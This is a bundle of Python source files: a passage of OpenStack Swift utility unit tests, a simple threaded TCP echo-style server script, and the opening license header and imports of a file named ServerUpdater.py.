self.assertEqual('\xef\xbf\xbd\xef\xbf\xbd\xec\xbc\x9d\xef\xbf\xbd',
utils.get_valid_utf8_str(invalid_utf8_str))
@reset_logger_state
def test_thread_locals(self):
logger = utils.get_logger(None)
# test the setter
logger.thread_locals = ('id', 'ip')
self.assertEqual(logger.thread_locals, ('id', 'ip'))
# reset
logger.thread_locals = (None, None)
self.assertEqual(logger.thread_locals, (None, None))
logger.txn_id = '1234'
logger.client_ip = '1.2.3.4'
self.assertEqual(logger.thread_locals, ('1234', '1.2.3.4'))
logger.txn_id = '5678'
logger.client_ip = '5.6.7.8'
self.assertEqual(logger.thread_locals, ('5678', '5.6.7.8'))
def test_no_fdatasync(self):
called = []
class NoFdatasync(object):
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.os', NoFdatasync()):
with patch('swift.common.utils.fsync', fsync):
utils.fdatasync(12345)
self.assertEqual(called, [12345])
def test_yes_fdatasync(self):
called = []
class YesFdatasync(object):
def fdatasync(self, fd):
called.append(fd)
with patch('swift.common.utils.os', YesFdatasync()):
utils.fdatasync(12345)
self.assertEqual(called, [12345])
def test_fsync_bad_fullsync(self):
class FCNTL(object):
F_FULLSYNC = 123
def fcntl(self, fd, op):
raise IOError(18)
with patch('swift.common.utils.fcntl', FCNTL()):
self.assertRaises(OSError, lambda: utils.fsync(12345))
def test_fsync_f_fullsync(self):
called = []
class FCNTL(object):
F_FULLSYNC = 123
def fcntl(self, fd, op):
called[:] = [fd, op]
return 0
with patch('swift.common.utils.fcntl', FCNTL()):
utils.fsync(12345)
self.assertEqual(called, [12345, 123])
def test_fsync_no_fullsync(self):
called = []
class FCNTL(object):
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.fcntl', FCNTL()):
with patch('os.fsync', fsync):
utils.fsync(12345)
self.assertEqual(called, [12345])
class TestThreadPool(unittest.TestCase):
def setUp(self):
self.tp = None
def tearDown(self):
if self.tp:
self.tp.terminate()
def _pipe_count(self):
# Counts the number of pipes that this process owns.
fd_dir = "/proc/%d/fd" % os.getpid()
def is_pipe(path):
try:
stat_result = os.stat(path)
return stat.S_ISFIFO(stat_result.st_mode)
except OSError:
return False
return len([fd for fd in os.listdir(fd_dir)
if is_pipe(os.path.join(fd_dir, fd))])
def _thread_id(self):
return threading.current_thread().ident
def _capture_args(self, *args, **kwargs):
return {'args': args, 'kwargs': kwargs}
def _raise_valueerror(self):
return int('fishcakes')
def test_run_in_thread_with_threads(self):
tp = self.tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertNotEqual(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
caught = False
try:
tp.run_in_thread(self._raise_valueerror)
except ValueError:
caught = True
self.assertTrue(caught)
def test_force_run_in_thread_with_threads(self):
# with nthreads > 0, force_run_in_thread looks just like run_in_thread
tp = self.tp = utils.ThreadPool(1)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEqual(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
self.assertRaises(ValueError, tp.force_run_in_thread,
self._raise_valueerror)
def test_run_in_thread_without_threads(self):
# with zero threads, run_in_thread doesn't actually do so
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.run_in_thread(self._thread_id)
self.assertEqual(my_id, other_id)
result = tp.run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
self.assertRaises(ValueError, tp.run_in_thread,
self._raise_valueerror)
def test_force_run_in_thread_without_threads(self):
# with zero threads, force_run_in_thread uses eventlet.tpool
tp = utils.ThreadPool(0)
my_id = self._thread_id()
other_id = tp.force_run_in_thread(self._thread_id)
self.assertNotEqual(my_id, other_id)
result = tp.force_run_in_thread(self._capture_args, 1, 2, bert='ernie')
self.assertEqual(result, {'args': (1, 2),
'kwargs': {'bert': 'ernie'}})
self.assertRaises(ValueError, tp.force_run_in_thread,
self._raise_valueerror)
def test_preserving_stack_trace_from_thread(self):
def gamma():
return 1 / 0 # ZeroDivisionError
def beta():
return gamma()
def alpha():
return beta()
tp = self.tp = utils.ThreadPool(1)
try:
tp.run_in_thread(alpha)
except ZeroDivisionError:
# NB: format is (filename, line number, function name, text)
tb_func = [elem[2] for elem
in traceback.extract_tb(sys.exc_info()[2])]
else:
self.fail("Expected ZeroDivisionError")
self.assertEqual(tb_func[-1], "gamma")
self.assertEqual(tb_func[-2], "beta")
self.assertEqual(tb_func[-3], "alpha")
# omit the middle; what's important is that the start and end are
# included, not the exact names of helper methods
self.assertEqual(tb_func[1], "run_in_thread")
self.assertEqual(tb_func[0], "test_preserving_stack_trace_from_thread")
def test_terminate(self):
initial_thread_count = threading.activeCount()
initial_pipe_count = self._pipe_count()
tp = utils.ThreadPool(4)
# do some work to ensure any lazy initialization happens
tp.run_in_thread(os.path.join, 'foo', 'bar')
tp.run_in_thread(os.path.join, 'baz', 'quux')
        # 4 threads in the ThreadPool, plus one pipe for IPC (a single pipe
        # shows up as two FIFO fds, hence the -2 below); this also serves as
        # a sanity check that we're actually allocating some resources to
        # free later
self.assertEqual(initial_thread_count, threading.activeCount() - 4)
self.assertEqual(initial_pipe_count, self._pipe_count() - 2)
tp.terminate()
self.assertEqual(initial_thread_count, threading.activeCount())
self.assertEqual(initial_pipe_count, self._pipe_count())
def test_cant_run_after_terminate(self):
tp = utils.ThreadPool(0)
tp.terminate()
self.assertRaises(ThreadPoolDead, tp.run_in_thread, lambda: 1)
self.assertRaises(ThreadPoolDead, tp.force_run_in_thread, lambda: 1)
def test_double_terminate_doesnt_crash(self):
tp = utils.ThreadPool(0)
tp.terminate()
tp.terminate()
tp = utils.ThreadPool(1)
tp.terminate()
tp.terminate()
def test_terminate_no_threads_doesnt_crash(self):
tp = utils.ThreadPool(0)
tp.terminate()
class TestAuditLocationGenerator(unittest.TestCase):
def test_drive_tree_access(self):
orig_listdir = utils.listdir
def _mock_utils_listdir(path):
if 'bad_part' in path:
raise OSError(errno.EACCES)
elif 'bad_suffix' in path:
raise OSError(errno.EACCES)
elif 'bad_hash' in path:
raise OSError(errno.EACCES)
else:
return orig_listdir(path)
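        # audit_location_generator walks
        # <root>/<drive>/<datadir>/<partition>/<suffix>/<hash>/<object>;
        # the mocked listdir raises EACCES at the partition, suffix and hash
        # levels in turn to check that such errors propagate out of the
        # generator.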
# Check Raise on Bad partition
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
obj_path = os.path.join(data, "bad_part")
with open(obj_path, "w"):
pass
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
part2 = os.path.join(data, "partition2")
os.makedirs(part2)
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
# Check Raise on Bad Suffix
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
part2 = os.path.join(data, "partition2")
os.makedirs(part2)
obj_path = os.path.join(part1, "bad_suffix")
with open(obj_path, 'w'):
pass
suffix = os.path.join(part2, "suffix")
os.makedirs(suffix)
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
# Check Raise on Bad Hash
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
suffix = os.path.join(part1, "suffix")
os.makedirs(suffix)
hash1 = os.path.join(suffix, "hash1")
os.makedirs(hash1)
obj_path = os.path.join(suffix, "bad_hash")
with open(obj_path, 'w'):
pass
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
def test_non_dir_drive(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
            # Create a file that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
self.assertEqual(list(locations), [])
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
# Test without the logger
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False
)
self.assertEqual(list(locations), [])
def test_mount_check_drive(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
            # Create a file that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=True, logger=logger
)
self.assertEqual(list(locations), [])
self.assertEqual(2, len(logger.get_lines_for_level('warning')))
# Test without the logger
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=True
)
self.assertEqual(list(locations), [])
def test_non_dir_contents(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
with open(os.path.join(data, "partition1"), "w"):
pass
partition = os.path.join(data, "partition2")
os.makedirs(partition)
with open(os.path.join(partition, "suffix1"), "w"):
pass
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
with open(os.path.join(suffix, "hash1"), "w"):
pass
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
self.assertEqual(list(locations), [])
def test_find_objects(self):
with temptree([]) as tmpdir:
expected_objs = list()
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
            # Create a file that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
partition = os.path.join(data, "partition1")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj1.db")
with open(obj_path, "w"):
pass
expected_objs.append((obj_path, 'drive', 'partition1'))
partition = os.path.join(data, "partition2")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash2")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj2.db")
with open(obj_path, "w"):
pass
expected_objs.append((obj_path, 'drive', 'partition2'))
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
got_objs = list(locations)
self.assertEqual(len(got_objs), len(expected_objs))
self.assertEqual(sorted(got_objs), sorted(expected_objs))
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
def test_ignore_metadata(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
partition = os.path.join(data, "partition2")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash2")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj1.dat")
with open(obj_path, "w"):
pass
meta_path = os.path.join(hash_path, "obj1.meta")
with open(meta_path, "w"):
pass
locations = utils.audit_location_generator(
tmpdir, "data", ".dat", mount_check=False, logger=logger
)
self.assertEqual(list(locations),
[(obj_path, "drive", "partition2")])
class TestGreenAsyncPile(unittest.TestCase):
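    # GreenAsyncPile(n) runs spawned callables on up to n greenthreads;
    # iterating the pile yields results as they complete, next() returns
    # None for callables that return nothing, and waitall(timeout) collects
    # whatever finishes within the timeout.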
def test_runs_everything(self):
def run_test():
tests_ran[0] += 1
return tests_ran[0]
tests_ran = [0]
pile = utils.GreenAsyncPile(3)
for x in range(3):
pile.spawn(run_test)
self.assertEqual(sorted(x for x in pile), [1, 2, 3])
def test_is_asynchronous(self):
def run_test(index):
events[index].wait()
return index
pile = utils.GreenAsyncPile(3)
for order in ((1, 2, 0), (0, 1, 2), (2, 1, 0), (0, 2, 1)):
events = [eventlet.event.Event(), eventlet.event.Event(),
eventlet.event.Event()]
for x in range(3):
pile.spawn(run_test, x)
for x in order:
events[x].send()
self.assertEqual(next(pile), x)
def test_next_when_empty(self):
def run_test():
pass
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test)
self.assertEqual(next(pile), None)
self.assertRaises(StopIteration, lambda: next(pile))
def test_waitall_timeout_timesout(self):
def run_test(sleep_duration):
eventlet.sleep(sleep_duration)
completed[0] += 1
return sleep_duration
completed = [0]
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 0.1)
pile.spawn(run_test, 1.0)
self.assertEqual(pile.waitall(0.5), [0.1])
self.assertEqual(completed[0], 1)
def test_waitall_timeout_completes(self):
def run_test(sleep_duration):
eventlet.sleep(sleep_duration)
completed[0] += 1
return sleep_duration
completed = [0]
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 0.1)
pile.spawn(run_test, 0.1)
self.assertEqual(pile.waitall(0.5), [0.1, 0.1])
self.assertEqual(completed[0], 2)
def test_pending(self):
pile = utils.GreenAsyncPile(3)
self.assertEqual(0, pile._pending)
for repeats in range(2):
            # repeat to verify that pending goes back up after going down
for i in range(4):
pile.spawn(lambda: i)
self.assertEqual(4, pile._pending)
for i in range(3, -1, -1):
next(pile)
self.assertEqual(i, pile._pending)
# sanity check - the pile is empty
self.assertRaises(StopIteration, pile.next)
# pending remains 0
self.assertEqual(0, pile._pending)
class TestLRUCache(unittest.TestCase):
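    # The tests below rely on a patching trick: once a value is cached,
    # math.sqrt is patched away, so getting the correct answer proves it
    # came from the cache, while a TypeError (from calling the None patch)
    # proves the entry was evicted or has expired.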
def test_maxsize(self):
@utils.LRUCache(maxsize=10)
def f(*args):
return math.sqrt(*args)
_orig_math_sqrt = math.sqrt
# setup cache [0-10)
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate cache [0-10)
with patch('math.sqrt'):
for i in range(10):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# update cache [10-20)
for i in range(10, 20):
self.assertEqual(math.sqrt(i), f(i))
# cache size is fixed
self.assertEqual(f.size(), 10)
# validate cache [10-20)
with patch('math.sqrt'):
for i in range(10, 20):
self.assertEqual(_orig_math_sqrt(i), f(i))
# validate un-cached [0-10)
with patch('math.sqrt', new=None):
for i in range(10):
self.assertRaises(TypeError, f, i)
# cache unchanged
self.assertEqual(f.size(), 10)
with patch('math.sqrt'):
for i in range(10, 20):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
def test_maxtime(self):
@utils.LRUCache(maxtime=30)
def f(*args):
return math.sqrt(*args)
self.assertEqual(30, f.maxtime)
_orig_math_sqrt = math.sqrt
now = time.time()
the_future = now + 31
# setup cache [0-10)
with patch('time.time', lambda: now):
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate cache [0-10)
with patch('math.sqrt'):
for i in range(10):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate expired [0-10)
with patch('math.sqrt', new=None):
with patch('time.time', lambda: the_future):
for i in range(10):
self.assertRaises(TypeError, f, i)
# validate repopulates [0-10)
with patch('time.time', lambda: the_future):
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
# reuses cache space
self.assertEqual(f.size(), 10)
def test_set_maxtime(self):
@utils.LRUCache(maxtime=30)
def f(*args):
return math.sqrt(*args)
self.assertEqual(30, f.maxtime)
self.assertEqual(2, f(4))
self.assertEqual(1, f.size())
# expire everything
f.maxtime = -1
# validate un-cached [0-10)
with patch('math.sqrt', new=None):
self.assertRaises(TypeError, f, 4)
def test_set_maxsize(self):
@utils.LRUCache(maxsize=10)
def f(*args):
return math.sqrt(*args)
for i in range(12):
f(i)
self.assertEqual(f.size(), 10)
f.maxsize = 4
for i in range(12):
f(i)
self.assertEqual(f.size(), 4)
class TestParseContentRange(unittest.TestCase):
def test_good(self):
start, end, total = utils.parse_content_range("bytes 100-200/300")
self.assertEqual(start, 100)
self.assertEqual(end, 200)
self.assertEqual(total, 300)
def test_bad(self):
self.assertRaises(ValueError, utils.parse_content_range,
"100-300/500")
self.assertRaises(ValueError, utils.parse_content_range,
"bytes 100-200/aardvark")
self.assertRaises(ValueError, utils.parse_content_range,
"bytes bulbous-bouffant/4994801")
class TestParseContentDisposition(unittest.TestCase):
def test_basic_content_type(self):
name, attrs = utils.parse_content_disposition('text/plain')
self.assertEqual(name, 'text/plain')
self.assertEqual(attrs, {})
def test_content_type_with_charset(self):
name, attrs = utils.parse_content_disposition(
'text/plain; charset=UTF8')
self.assertEqual(name, 'text/plain')
self.assertEqual(attrs, {'charset': 'UTF8'})
def test_content_disposition(self):
name, attrs = utils.parse_content_disposition(
'form-data; name="somefile"; filename="test.html"')
self.assertEqual(name, 'form-data')
self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'})
def test_content_disposition_without_white_space(self):
name, attrs = utils.parse_content_disposition(
'form-data;name="somefile";filename="test.html"')
self.assertEqual(name, 'form-data')
self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'})
class TestIterMultipartMimeDocuments(unittest.TestCase):
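    # iter_multipart_mime_documents yields one file-like object per MIME
    # part of a stream delimited by "--<boundary>" lines: it raises
    # MimeInvalid if the stream does not start with the boundary, tolerates
    # leading CRLFs and truncated bodies, and stops after "--<boundary>--".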
def test_bad_start(self):
it = utils.iter_multipart_mime_documents(StringIO('blah'), 'unique')
exc = None
try:
next(it)
except MimeInvalid as err:
exc = err
self.assertTrue('invalid starting boundary' in str(exc))
self.assertTrue('--unique' in str(exc))
def test_empty(self):
it = utils.iter_multipart_mime_documents(StringIO('--unique'),
'unique')
fp = next(it)
self.assertEqual(fp.read(), '')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_basic(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique--'), 'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abcdefg')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_basic2(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abcdefg')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_tiny_reads(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(2), 'ab')
self.assertEqual(fp.read(2), 'cd')
self.assertEqual(fp.read(2), 'ef')
self.assertEqual(fp.read(2), 'g')
self.assertEqual(fp.read(2), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_big_reads(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(65536), 'abcdefg')
self.assertEqual(fp.read(), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_leading_crlfs(self):
it = utils.iter_multipart_mime_documents(
StringIO('\r\n\r\n\r\n--unique\r\nabcdefg\r\n'
'--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(65536), 'abcdefg')
self.assertEqual(fp.read(), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
        self.assertRaises(StopIteration, next, it)
def test_broken_mid_stream(self):
# We go ahead and accept whatever is sent instead of rejecting the
# whole request, in case the partial form is still useful.
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabc'), 'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abc')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_readline(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n\r\n'
'jkl\r\n\r\n--unique--'), 'unique')
fp = next(it)
self.assertEqual(fp.readline(), 'ab\r\n')
self.assertEqual(fp.readline(), 'cd\ref\ng')
self.assertEqual(fp.readline(), '')
fp = next(it)
self.assertEqual(fp.readline(), 'hi\r\n')
self.assertEqual(fp.readline(), '\r\n')
self.assertEqual(fp.readline(), 'jkl\r\n')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_readline_with_tiny_chunks(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n'
'\r\njkl\r\n\r\n--unique--'),
'unique',
read_chunk_size=2)
fp = next(it)
self.assertEqual(fp.readline(), 'ab\r\n')
self.assertEqual(fp.readline(), 'cd\ref\ng')
self.assertEqual(fp.readline(), '')
fp = next(it)
self.assertEqual(fp.readline(), 'hi\r\n')
self.assertEqual(fp.readline(), '\r\n')
self.assertEqual(fp.readline(), 'jkl\r\n')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
class TestParseMimeHeaders(unittest.TestCase):
def test_parse_mime_headers(self):
doc_file = BytesIO(b"""Content-Disposition: form-data; name="file_size"
Foo: Bar
NOT-title-cAsED: quux
Connexion: =?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?=
Status: =?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?=
Latin-1: Resincronizaci\xf3n realizada con \xe9xito
Utf-8: \xd0\xba\xd0\xbe\xd0\xbd\xd1\x82\xd0\xb5\xd0\xb9\xd0\xbd\xd0\xb5\xd1\x80
This is the body
""")
headers = utils.parse_mime_headers(doc_file)
expected_headers = {
'Content-Disposition': 'form-data; name="file_size"',
'Foo': "Bar",
'Not-Title-Cased': "quux",
# Encoded-word or non-ASCII values are treated just like any other
# bytestring (at least for now)
'Connexion': "=?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?=",
'Status': "=?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?=",
'Latin-1': "Resincronizaci\xf3n realizada con \xe9xito",
'Utf-8': ("\xd0\xba\xd0\xbe\xd0\xbd\xd1\x82\xd0\xb5\xd0\xb9\xd0"
"\xbd\xd0\xb5\xd1\x80")
}
self.assertEqual(expected_headers, headers)
self.assertEqual(b"This is the body\n", doc_file.read())
class FakeResponse(object):
def __init__(self, status, headers, body):
self.status = status
self.headers = HeaderKeyDict(headers)
self.body = StringIO(body)
def getheader(self, header_name):
return str(self.headers.get(header_name, ''))
def getheaders(self):
return self.headers.items()
def read(self, length=None):
return self.body.read(length)
def readline(self, length=None):
return self.body.readline(length)
class TestHTTPResponseToDocumentIters(unittest.TestCase):
def test_200(self):
fr = FakeResponse(
200,
{'Content-Length': '10', 'Content-Type': 'application/lunch'},
'sandwiches')
doc_iters = utils.http_response_to_document_iters(fr)
first_byte, last_byte, length, headers, body = next(doc_iters)
self.assertEqual(first_byte, 0)
self.assertEqual(last_byte, 9)
self.assertEqual(length, 10)
header_dict = HeaderKeyDict(headers)
self.assertEqual(header_dict.get('Content-Length'), '10')
self.assertEqual(header_dict.get('Content-Type'), 'application/lunch')
self.assertEqual(body.read(), 'sandwiches')
self.assertRaises(StopIteration, next, doc_iters)
def test_206_single_range(self):
fr = FakeResponse(
206,
{'Content-Length': '8', 'Content-Type': 'application/lunch',
'Content-Range': 'bytes 1-8/10'},
'andwiche')
doc_iters = utils.http_response_to_document_iters(fr)
first_byte, last_byte, length, headers, body = next(doc_iters)
self.assertEqual(first_byte, 1)
self.assertEqual(last_byte, 8)
self.assertEqual(length, 10)
header_dict = HeaderKeyDict(headers)
self.assertEqual(header_dict.get('Content-Length'), '8')
self.assertEqual(header_dict.get('Content-Type'), 'application/lunch')
self.assertEqual(body.read(), 'andwiche')
self.assertRaises(StopIteration, next, doc_iters)
def test_206_multiple_ranges(self):
fr = FakeResponse(
206,
{'Content-Type': 'multipart/byteranges; boundary=asdfasdfasdf'},
("--asdfasdfasdf\r\n"
"Content-Type: application/lunch\r\n"
"Content-Range: bytes 0-3/10\r\n"
"\r\n"
"sand\r\n"
"--asdfasdfasdf\r\n"
"Content-Type: application/lunch\r\n"
"Content-Range: bytes 6-9/10\r\n"
"\r\n"
"ches\r\n"
"--asdfasdfasdf--"))
doc_iters = utils.http_response_to_document_iters(fr)
first_byte, last_byte, length, headers, body = next(doc_iters)
self.assertEqual(first_byte, 0)
self.assertEqual(last_byte, 3)
self.assertEqual(length, 10)
header_dict = HeaderKeyDict(headers)
self.assertEqual(header_dict.get('Content-Type'), 'application/lunch')
self.assertEqual(body.read(), 'sand')
first_byte, last_byte, length, headers, body = next(doc_iters)
self.assertEqual(first_byte, 6)
self.assertEqual(last_byte, 9)
self.assertEqual(length, 10)
header_dict = HeaderKeyDict(headers)
self.assertEqual(header_dict.get('Content-Type'), 'application/lunch')
self.assertEqual(body.read(), 'ches')
self.assertRaises(StopIteration, next, doc_iters)
class TestDocumentItersToHTTPResponseBody(unittest.TestCase):
def test_no_parts(self):
body = utils.document_iters_to_http_response_body(
iter([]), 'dontcare',
multipart=False, logger=FakeLogger())
self.assertEqual(body, '')
def test_single_part(self):
body = "time flies like an arrow; fruit flies like a banana"
doc_iters = [{'part_iter': iter(StringIO(body).read, '')}]
resp_body = ''.join(
utils.document_iters_to_http_response_body(
iter(doc_iters), 'dontcare',
multipart=False, logger=FakeLogger()))
self.assertEqual(resp_body, body)
def test_multiple_parts(self):
part1 = "two peanuts were walking down a railroad track"
part2 = "and one was a salted. ... peanut."
doc_iters = [{
'start_byte': 88,
'end_byte': 133,
'content_type': 'application/peanut',
'entity_length': 1024,
'part_iter': iter(StringIO(part1).read, ''),
}, {
'start_byte': 500,
'end_byte': 532,
'content_type': 'application/salted',
'entity_length': 1024,
'part_iter': iter(StringIO(part2).read, ''),
}]
resp_body = ''.join(
utils.document_iters_to_http_response_body(
iter(doc_iters), 'boundaryboundary',
multipart=True, logger=FakeLogger()))
self.assertEqual(resp_body, (
"--boundaryboundary\r\n" +
# This is a little too strict; we don't actually care that the
# headers are in this order, but the test is much more legible
# this way.
"Content-Type: application/peanut\r\n" +
"Content-Range: bytes 88-133/1024\r\n" +
"\r\n" +
part1 + "\r\n" +
"--boundaryboundary\r\n"
"Content-Type: application/salted\r\n" +
"Content-Range: bytes 500-532/1024\r\n" +
"\r\n" +
part2 + "\r\n" +
"--boundaryboundary--"))
class TestPairs(unittest.TestCase):
def test_pairs(self):
items = [10, 20, 30, 40, 50, 60]
got_pairs = set(utils.pairs(items))
self.assertEqual(got_pairs,
set([(10, 20), (10, 30), (10, 40), (10, 50), (10, 60),
(20, 30), (20, 40), (20, 50), (20, 60),
(30, 40), (30, 50), (30, 60),
(40, 50), (40, 60),
(50, 60)]))
if __name__ == '__main__':
unittest.main()
|
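For quick reference, the Content-Range values exercised by TestParseContentRange above follow the "bytes <start>-<end>/<total>" form from RFC 7233. A standalone parser with the behaviour those tests expect might look like the sketch below (an illustrative re-implementation, not Swift's actual utils.parse_content_range):

import re

def parse_content_range(value):
    # Accepts e.g. "bytes 100-200/300"; anything else is rejected with
    # ValueError, matching the failure cases in TestParseContentRange.
    found = re.search(r'^bytes (\d+)-(\d+)/(\d+)$', value)
    if not found:
        raise ValueError('invalid content-range %r' % (value,))
    return tuple(int(x) for x in found.groups())

assert parse_content_range("bytes 100-200/300") == (100, 200, 300)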
tcp_server.py | '''
Made By Sai Harsha Kottapalli
Tested on python3
About : TCP Server
Use : for command shells or proxy
'''
import socket
import argparse
from threading import Thread
def handler(s_client):
resp = s_client.recv(1024).decode("utf-8") #response
print("[*]Received: %s " % resp)
s_client.send(b"hi")
s_client.close()
return
def main():
ip = "0.0.0.0"
port = 9999
server = socket.socket()
server.bind((ip,port))
server.listen(5)
print("[*]Listening on %s:%d" %(ip,port))
while True:
        client, addr = server.accept()
        print("[*]Connected to %s:%d" % (addr[0], addr[1]))
        # handle each client in its own thread
        t = Thread(target=handler, args=(client,))
        t.start()
if __name__ == "__main__":
main() |
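A minimal companion client to exercise tcp_server.py (a hypothetical illustration, not part of the original file). It assumes the server is reachable on 127.0.0.1:9999, the address hard-coded in main() above:

# tcp_client.py (illustrative sketch)
import socket

def main():
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(("127.0.0.1", 9999))
    client.send(b"hello server")             # handler() prints this on the server
    response = client.recv(1024)             # server answers with b"hi"
    print("[*]Received: %s" % response.decode("utf-8"))
    client.close()

if __name__ == "__main__":
    main()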
ServerUpdater.py |
# Copyright 2016 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals, absolute_import
import sys
import time
import json, requests
import traceback
import logging
try:
from queue import Empty
except ImportError:
from Queue import Empty
from requests.packages.urllib3.exceptions import InsecureRequestWarning
